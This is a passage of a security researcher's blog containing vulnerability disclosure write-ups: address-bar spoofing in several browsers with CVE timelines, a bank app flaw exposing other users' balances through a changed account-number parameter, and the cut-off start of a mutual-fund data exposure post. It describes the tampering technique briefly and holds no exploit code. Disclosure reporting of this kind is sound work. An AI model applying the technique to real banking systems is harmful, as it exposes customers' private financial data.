src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinGHdvc_QqaTjTByNnMnkMw-LK8bP94Ll3EkR0ChmzgTM7Agbxxreb2olIKqodFos34JsJOWlWbNhUpdzABoBR3DasfHiDZo_XPD0sNp3mssOKYmQE9GE2O_7tloe7F7knZHJqivNC5RA/w394-h400/4.Jio+Reminder+Reply.jpeg" width="394" /></a></div><br /><div><b><br /></b></div><div><b><br /></b></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div><br /></div><div><br /></div><div><br /></div><div>Shared Timeline for my of Public Disclosure With Jio Team when they responding- Oct 7th and Oct 14th 2020</div><div>Public Disclosure was about to Out on 8th Nov but due to some issues couldn't make it.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkpSlUdz94Ep4TuzddQwCry1tpVcyRbnGHQCtB20Z25Jpp0sPVHCwwtlD_eqWy3p6q-kOD2zpZV3fEQwvjQcVeJcIylUcRWlTdR4DwAPJ6kW1aJj10npSjybMBJ6LKgUTIOV_n5369nE4/s1280/Jio+Disclose+Email.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1280" data-original-width="1048" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkpSlUdz94Ep4TuzddQwCry1tpVcyRbnGHQCtB20Z25Jpp0sPVHCwwtlD_eqWy3p6q-kOD2zpZV3fEQwvjQcVeJcIylUcRWlTdR4DwAPJ6kW1aJj10npSjybMBJ6LKgUTIOV_n5369nE4/w328-h400/Jio+Disclose+Email.jpeg" width="328" /></a></div><br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div><br /></div><div>Final Disclosure Made on- 20th Nov 2020.</div><div>Fixed - Looks like the new version of Jio Browser (Jio Pages) has fixed this issue, not confirmed.</div><div><br /></div><div><b>===========================================================================</b></div><div><br /></div><div><br /></div><div style="text-align: center;"><h1><b>Apple Safari Web Browser Address Bar Spoofing Vulnerability</b></h1></div><div>Just Like this Apple Safari Browser 13.1.1 Running on MacOS Catalina also found vulnerable. Here is the ScreenShot for the same.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs0uu6bdc1ZboR4i7Ot4rjjC9G0VZtCFScJCvtr_rMjXL1cVO-FW8ZA5AkdO7jchAMi9y2Mru29W0fEXM-YMnOsS0POMCFDJQLYYxrvKPcDULC_JrD9T5x8ECGJC5ZqpWOWVeTA34_txU/s684/Screenshot+2020-11-19+at+6.12.23+PM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="401" data-original-width="684" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs0uu6bdc1ZboR4i7Ot4rjjC9G0VZtCFScJCvtr_rMjXL1cVO-FW8ZA5AkdO7jchAMi9y2Mru29W0fEXM-YMnOsS0POMCFDJQLYYxrvKPcDULC_JrD9T5x8ECGJC5ZqpWOWVeTA34_txU/w640-h376/Screenshot+2020-11-19+at+6.12.23+PM.png" width="640" /></a></div><br /><div style="text-align: center;"><br /></div><div><br /></div><div><b>Tested Environment</b><div><b><br /></b><div>Device - Macbook Pro Mid 2012<div>MacOS Catalina 10.15.5</div><div>Safari Version - 13.1.1</div><div><br /></div><div><b>Timeline of Reporting</b></div><div>Initial Report- June 21 2020</div></div></div></div><div>First Response - June 21 2020</div><div>Public Release of The Fixed - https://support.apple.com/en-in/HT211934 </div><div>Safari 14.0.1</div><div>CVE: 2020-9945</div><div>Acknowledgement of Public Disclosure Approval.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9A_m_itYGLIncUwdoocWjyJizV3a6n95bkaIRpT3B5x1aYBRKNvZOSdHgJ5teMQpfIfV15euCLciWpEXj9BSWgzDYG2EzI0ELJlVaJErSdAmMagZ26u1VvjjgGxq-eRnuapyJbRRcrtk/s1065/IMG_20201205_110508.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1055" data-original-width="1065" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9A_m_itYGLIncUwdoocWjyJizV3a6n95bkaIRpT3B5x1aYBRKNvZOSdHgJ5teMQpfIfV15euCLciWpEXj9BSWgzDYG2EzI0ELJlVaJErSdAmMagZ26u1VvjjgGxq-eRnuapyJbRRcrtk/s320/IMG_20201205_110508.jpg" width="320" /></a></div><div><div style="text-align: left;"><h2 style="text-align: center;"><br /></h2></div><div style="text-align: center;"><div><div><div><br /></div></div></div><div><div style="text-align: left;">===========================================================================</div><div style="text-align: left;"><h2 style="text-align: center;"><b><br /></b></h2><h1 style="text-align: center;">BitDefender Safe Pay Web <b>Browser Address Bar Spoofing Vulnerability</b></h1><div style="text-align: center;"><br /></div></div><div style="text-align: left;"><br /></div><div style="text-align: left;">BitDefender Safe Pay Web Browser is also found affected for the same vulnerability. </div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div><div>Here is the Video Demonstration.</div><div><br /></div><div><br /></div></div></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/tT4-Tbe-RaQ" width="320" youtube-src-id="tT4-Tbe-RaQ"></iframe></div><br /><div style="text-align: center;"><br /></div></div><div style="text-align: left;"><div><b>Test Environment:</b></div><div><b>===============</b></div><div>Windows 10 Home 64 Bit with Latest Updates</div><div><b><br /></b></div><div><b>Affected Product Details:</b></div><div><b>=======================</b></div><div>BitDefender AntiVirus Plus 2020</div><div>Build 24.0.26.137</div><div>Last Product Update 14-07-2020 15:21</div></div><div style="text-align: left;"><b><br /></b></div><div style="text-align: left;"><b>Timeline</b></div><div style="text-align: left;"><b>First Report</b> - July 21, 2020</div><div style="text-align: left;"><b>Acknowledged</b> - July 28, 2020</div><div style="text-align: left;">CVE: 2020-15733</div><div style="text-align: left;"><b>Fix Released</b>: The fix was implemented by October 6th 2020.</div><div style="text-align: left;">Advisory - <a href="https://www.bitdefender.com/support/security-advisories/url-spoofing-vulnerability-bitdefender-safepay-va-8958/">https://www.bitdefender.com/support/security-advisories/url-spoofing-vulnerability-bitdefender-safepay-va-8958/</a></div><div style="text-align: center;"><br /></div><div style="text-align: left;"><div>===========================================================================</div><div><h2 style="text-align: center;"><b><br /></b></h2><h1 style="text-align: center;">F-Secure Safe Android <b>Browser Address Bar Spoofing Vulnerability</b></h1><div style="text-align: center;"><br /></div></div><div><br /></div><div>F-Secure have an Inbuilt Android Browser called "F-Safe" Android Browser which was found affected for the same vulnerability. </div><div><br /></div><div><br /></div><div><div style="text-align: center;">Here is the Video Demonstration.</div><div style="text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/nYn1NtSq2RE" width="320" youtube-src-id="nYn1NtSq2RE"></iframe></div><br /><div style="text-align: center;"><br /></div><div><br style="text-align: center;" /></div></div><div><div><b>Affected Product</b></div><div>Testing Environment - Android 10, Device OnePlus 5T.</div><div>F-Secure Android Antivirus Version - 17.8.0014763 FS_GP</div></div><div><br /></div><div><br /></div><div><div><b>Timeline</b></div><div>First Report - June 14, 2020</div><div>Fix Released via Version 17.9</div><div style="text-align: center;"><br /></div></div><div style="text-align: center;">===========================================================================</div></div><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><h1 style="text-align: center;">2 more popular browsers found vulnerable, will update this Blog Post once permission received from Vendor.</h1><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: center;"><br /></div></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxqrCP_uc3AkL8-CkTDkuk8ujTKh2VfAmMogs33Bq5EbEJXLLPw4wqkWFb3kjlNNk3tqcGNfGyJ3I8qVrgBOtSH9bhPzSCn2SWkiwBa-ANYaMpS9qWYEsgLe4KeFYEakN71LveB83uAgg/s1280/1.Jio+Initial.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1280" data-original-width="847" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxqrCP_uc3AkL8-CkTDkuk8ujTKh2VfAmMogs33Bq5EbEJXLLPw4wqkWFb3kjlNNk3tqcGNfGyJ3I8qVrgBOtSH9bhPzSCn2SWkiwBa-ANYaMpS9qWYEsgLe4KeFYEakN71LveB83uAgg/s320/1.Jio+Initial.jpeg" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh2-JvFlyW0AayBkG8Y4-QOAd97J92NORk0JwLGgeg9P2auiHnVIvURt1xhmIb9EtDXJg0mUvWLgsitf752HpzncD6hxAuN-jrT8GFSF4xQjGnpzHVNc65OITtfIZbIhXr-3bf9MCFSDU/s1280/1.Jio+Initial.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1280" data-original-width="847" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh2-JvFlyW0AayBkG8Y4-QOAd97J92NORk0JwLGgeg9P2auiHnVIvURt1xhmIb9EtDXJg0mUvWLgsitf752HpzncD6hxAuN-jrT8GFSF4xQjGnpzHVNc65OITtfIZbIhXr-3bf9MCFSDU/s320/1.Jio+Initial.jpeg" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both;"><br /></div><div><br /></div></div><br /></div>
<a href="https://egghunter.in/check.html">link text</a>
Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-81225917767510612312019-05-11T10:54:00.000+05:302019-05-12T10:26:50.946+05:30Bank Vulnerability : Accessing Account Information of Other Users One in the Top 5 Private Bank Vulnerability - <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<b>"Saga Of "One of the Top 5 Private Bank Vulnerability - Accessing Account Information of Other Users</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This disclosure is regarding a vulnerability which left Remain Open Till 5 Months Even after a Reporting to Bank Officials. God known wether this was actively exploited or not but that was something serious which bank should take care but they did not till 10th May I asked them again about the status.<br />
<br />
I have found on "One of the Top 5 Bank" iPad Version application end of the last year Nov 23rd 2018 which is fixed on 10th May 2019.<br />
<br />
<br />
<a name='more'></a><br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
That vulnerability was allowing an intruder to access other user bank account information like there Total Balance, Last Transactions, PPF Balance other information as well.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
On Nov 22nd 2018 I was doing my bug bounty research at home on iOS applications; and on the same iPad Bank Mobile app was installed which I used for my daily banking transactions since 5 years I had opened my account. In the evening I need to pay my bills so I accessed the Bank Mobile app and paid my bills, meanwhile my proxy was by default configured; I Noticed an interesting parameter of account number. I just change this to something else I was able to access information of other that account.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I immediately call to customer care but unfortunately not able to connect with them So I sent them an email.(Airtel Network Sucks SomeTime)</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj34Aq8E9kiJDOygsq6ckg-sIusoMilErX9BAV0SyJfTJQWEqxyr9yGCf1g4eSjFmmkJ2PeiH8yXh1XbGIJtQM3NgOcClEMicc0npEq7Td0dsxPdASnpanASrtZK2PlLRyhhSqOwG8BOo/s1600/1.JPG" imageanchor="1"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj34Aq8E9kiJDOygsq6ckg-sIusoMilErX9BAV0SyJfTJQWEqxyr9yGCf1g4eSjFmmkJ2PeiH8yXh1XbGIJtQM3NgOcClEMicc0npEq7Td0dsxPdASnpanASrtZK2PlLRyhhSqOwG8BOo/s640/1.JPG" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Next day 24th Nov I got a call form customer care team and they asked me to share the information on their email(That email was looks like common one which might be accessible to all the customer executive team) I asked them to pass me an individual person email who can handle and to prevent this issue get known by everyone in their team but but they insist me to share on this and I did too with a Private POC Video!</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxaOpTPNUOr7sZQtl0vTtaz53Bm6qu7wJXA-KqMnYy2cJZUVeqYx7XLpjSF-Jl4TobVcFveMdSyC5sdAskHbBwfjnOBcVUo9H-fzOnPRDRSIcadpI16y6HRSQlu5RjWOWNdpn19vQ2U4/s1600/2.JPG" imageanchor="1"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxaOpTPNUOr7sZQtl0vTtaz53Bm6qu7wJXA-KqMnYy2cJZUVeqYx7XLpjSF-Jl4TobVcFveMdSyC5sdAskHbBwfjnOBcVUo9H-fzOnPRDRSIcadpI16y6HRSQlu5RjWOWNdpn19vQ2U4/s640/2.JPG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
On Nov 28th I asked them for an update and on the same day they replied with an email and said I need to uninstall and install the app again and I need to share the error message etc etc. I shared the Video last time and they guys was keep asking me for the error screen shot.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;">After all these 4 to 5 email and call communication with their customer care team I understood they are not understanding my email or either I am making a mistake while explaining them.</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Due to Criticality of the issue I decided to connect some one from your security team directly over the linkedIN and coincidently I found a Senior Person from their team On Nov 28th 2018 I explained him all the details and sent an email to their official Email with screen shots and Video.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
=======================================================</div>
<div style="text-align: left;">
<b>THE ONE WHO HELPS, GET IN TROUBLE</b></div>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
<b>Just Next Day On Nov 29th I received a TradeMark Complaint on Youtube Channel( Youtube Strike Notice ) saying I have used "Bank</b>" <b>Logo In my Video without permission etc. etc. </b></div>
<div style="text-align: left;">
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkdAElEeoIdXh-8o57a2lqDzDpgbYd4rAlmZo4-DL6I3iAlqDDDQWSfAFpDGXW6J-uGfyWRRISsZdq9ywleKV3Kt4PZn1U4SkOvWeouGsdi2wElC8qz_FqbBQqEweKO4VEbgQ1AC7qQ-U/s1600/complaint.PNG" imageanchor="1"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkdAElEeoIdXh-8o57a2lqDzDpgbYd4rAlmZo4-DL6I3iAlqDDDQWSfAFpDGXW6J-uGfyWRRISsZdq9ywleKV3Kt4PZn1U4SkOvWeouGsdi2wElC8qz_FqbBQqEweKO4VEbgQ1AC7qQ-U/s640/complaint.PNG" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>I was Like I am helping you out and your team is sending me Strike Notice. If I do not drop/takedown the video in 48hours, my channel will be shut down. For my safety I did this and taken down the video.</b></div>
<div style="text-align: left;">
=====================================</div>
<div style="text-align: left;">
Lets continue-------</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Due to Critical Severity of the Issue I was in though that this vulnerability will get fix on next day and within a few hours. On Dec 9th 2018 I asked him for the update regarding the fixes I did not got any reply. </div>
<div style="text-align: left;">
Next day I forgot that thing Because I was in preparation for my marriage(Shopping, Grooming etc 😛) </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In the Feb I come back to my work and was trying to get recover from shock of marriage 😅 and I came across on Same LinkedIn chat in the Morning on 9th May 2019 I asked him for an update again but no reply. I immediately checked and Shocked that vulnerability was still open.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
At the same time I sent an email to that person saying that there is no response from 5 months and I just check and vulnerability is still open.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
On 10th May 2019 evening I got a message over linked someone from their team asking me mobile number, I shared and we spoke; He asked me to check again for the vulnerability. I was in office so asked him I will update him once I reached home.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In the night I checked and found that iPad Mobile Application is now forcing me to update its version to iPhone version. Its look like they have made some changes in their Initial API Call to prevent using iPad API/Web-Service anymore.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I cant not share the video because its content lots of Sensitive Information but I have sorted some POCs which is will not disclosed any sensitive information.<br />
<br /></div>
<div class="MsoListParagraph" style="text-align: left; text-indent: -18pt;">
<div>
<b>a . Below in the right we can see account ending 61 total balance is 164800. In the left side you can see I am accessing account balance of ending account with 62 which have total balance of 144XX.XX</b></div>
<h4 style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ0lDlfNB5F8JIHxhHtCJxApnA73bFpIeM7vQY1r884mnPnqDCYB3Q2avovQaEgRV_oZUWjkKnyUZFqMX8YMDVMH12G8Lrp0pIXV4krF6EJ0zDITKbgU99nKvVcP6CujCsnjO8zIfgXFY/s1600/Untitled.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ0lDlfNB5F8JIHxhHtCJxApnA73bFpIeM7vQY1r884mnPnqDCYB3Q2avovQaEgRV_oZUWjkKnyUZFqMX8YMDVMH12G8Lrp0pIXV4krF6EJ0zDITKbgU99nKvVcP6CujCsnjO8zIfgXFY/s640/Untitled.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;">Similar to previous one In the left side you can see I am accessing account balance of ending account with 63 which have total balance of 102XX.XX</span></div>
</h4>
</div>
<div style="height: 0px; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFjqILIQdDvFkhIkYIx4-lgr8BO5rwREdjz94StQ3G9jh_fWaMnbI2VhsrCRUqhzG2oy_tHkfF2eFI0Yk9tBvaWXi9N5TcfndGFMKFHmSVyc8d9aiQexQ280gW8Dna0wff_sS53ZLjCM/s1600/Untitled2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFjqILIQdDvFkhIkYIx4-lgr8BO5rwREdjz94StQ3G9jh_fWaMnbI2VhsrCRUqhzG2oy_tHkfF2eFI0Yk9tBvaWXi9N5TcfndGFMKFHmSVyc8d9aiQexQ280gW8Dna0wff_sS53ZLjCM/s640/Untitled2.png" width="640" /></a><br />
<br />
<h4>
According their team iPad was launch on 2015 but later its withdrawn due to requirement of SIM to enable on Device. Its looks like the app was a legacy one and found left to get it updated.<br />Here is the timeline of the disclosure.<br />1) Nov 23rd 2018 - Communicated to Customer Care Team<br />2) Nov 28th 2018 - Was Communicated to Customer Care Team but they might not understand the issue<br />3) Nov 28th 2018 - Connected with Some One From "<b>Bank</b>"<br />4) Dec 9th 2018 - Asked for an update but no response<br />5) May 9th 2019 - Asked for the update<br />6) May 9th 2019 - Rechecked and found the Issues Was open<br />7) May 10th 2019 - Communicated with Another Person from "<b>Bank</b>" and Confirm the Fixes.</h4>
<div>
<br /></div>
<div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
a<br />
<br />
<br />
<br />
<br />
<br />
s<br />
<br />
<br />
<br />
<br />
<br />
s</div>
</div>
<div style="text-align: left;">
<style>
<!--
/* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 1 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:-520092929 1073786111 9 0 415 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin-top:0cm;
margin-right:0cm;
margin-bottom:8.0pt;
margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Calibri;
color:black;
mso-ansi-language:EN-IN;
mso-fareast-language:EN-IN;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
margin-top:0cm;
margin-right:0cm;
margin-bottom:8.0pt;
margin-left:36.0pt;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Calibri;
color:black;
mso-ansi-language:EN-IN;
mso-fareast-language:EN-IN;}
p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0cm;
margin-right:0cm;
margin-bottom:0cm;
margin-left:36.0pt;
margin-bottom:.0001pt;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Calibri;
color:black;
mso-ansi-language:EN-IN;
mso-fareast-language:EN-IN;}
p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0cm;
margin-right:0cm;
margin-bottom:0cm;
margin-left:36.0pt;
margin-bottom:.0001pt;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Calibri;
color:black;
mso-ansi-language:EN-IN;
mso-fareast-language:EN-IN;}
p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0cm;
margin-right:0cm;
margin-bottom:8.0pt;
margin-left:36.0pt;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Calibri;
color:black;
mso-ansi-language:EN-IN;
mso-fareast-language:EN-IN;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:11.0pt;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:游明朝;
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-ansi-language:EN-IN;
mso-fareast-language:EN-IN;}
.MsoPapDefault
{mso-style-type:export-only;
margin-bottom:8.0pt;
line-height:107%;}
@page WordSection1
{size:612.0pt 792.0pt;
margin:72.0pt 90.0pt 72.0pt 90.0pt;
mso-header-margin:36.0pt;
mso-footer-margin:36.0pt;
mso-paper-source:0;}
div.WordSection1
{page:WordSection1;}
/* List Definitions */
@list l0
{mso-list-id:1455564230;
mso-list-type:hybrid;
mso-list-template-ids:1639380478 1074331663 1074331673 1074331675 1074331663 1074331673 1074331675 1074331663 1074331673 1074331675;}
@list l0:level1
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-18.0pt;}
@list l0:level2
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-18.0pt;}
@list l0:level3
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l0:level4
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-18.0pt;}
@list l0:level5
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-18.0pt;}
@list l0:level6
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
@list l0:level7
{mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-18.0pt;}
@list l0:level8
{mso-level-number-format:alpha-lower;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-18.0pt;}
@list l0:level9
{mso-level-number-format:roman-lower;
mso-level-tab-stop:none;
mso-level-number-position:right;
text-indent:-9.0pt;}
ol
{margin-bottom:0cm;}
ul
{margin-bottom:0cm;}
-->
</style></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-54101650589041609302018-11-24T17:34:00.001+05:302019-06-25T13:49:29.779+05:30Indian Mutual Fund Customer Data Is On Risk | Mutual Funds Vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVlRJfphcBEjQgRj4Fff03bTNyGCyJXTlo5x-H7X3CM9gySKBDpyhxKKSQ_LhhNU5j7uZ7_aNDnMcLwFFVKHRGrRM00AhYiXkWxLGo55mJU1aXZWPqa_Qgv2GI-7s4OX_NjJI8xpEVws8/s1600/mutual+funds660_113015080408_050917080340_053017025640.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="451" data-original-width="660" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVlRJfphcBEjQgRj4Fff03bTNyGCyJXTlo5x-H7X3CM9gySKBDpyhxKKSQ_LhhNU5j7uZ7_aNDnMcLwFFVKHRGrRM00AhYiXkWxLGo55mJU1aXZWPqa_Qgv2GI-7s4OX_NjJI8xpEVws8/s320/mutual+funds660_113015080408_050917080340_053017025640.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Image from - <a href="https://www.businesstoday.in/buzztop/buzztop-personal-finance/how-many-mutual-funds-should-you-own/story/253269.html">https://www.businesstoday.in/buzztop/buzztop-personal-finance/how-many-mutual-funds-should-you-own/story/253269.html</a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h3 style="clear: both; text-align: center;">
<b>Indian Mutual Fund Customer Data Is On Risk | Mutual Funds Vulnerability</b></h3>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Mutual Funds in India is growing today and most of the people are investing some part of income for a better future and creating a good wealth through SIP and LumpSum. In India we have around 34 AMCs out there. While Investing users need to submit their data ex. <b>Name, Email, Address, PAN, Aadhar Number</b> etc. details to AMCs for KYC process. Having those kind of Critical Details of customers can be useful for Cyber Criminals to get their hands on it for fraud and other criminal activities.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
I also invested in number of AMCs for better wealth in future . While browsing AMCs Applications what I have found that AMCs are not taking their Security Seriously which putting Customers Data on the Risk.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
While my research I was able to VIEW and MODIFY data ex. Name, Email, PANCARD, Aadhar Number, of other users EVEN I WAS ABLE TO RESET ANY USER PASSWORD WITHOUT ANY USER INTERACTION.(Tested on my Relatives Account with their permission 😅 )</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
For an instance, below we can see the customer details. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
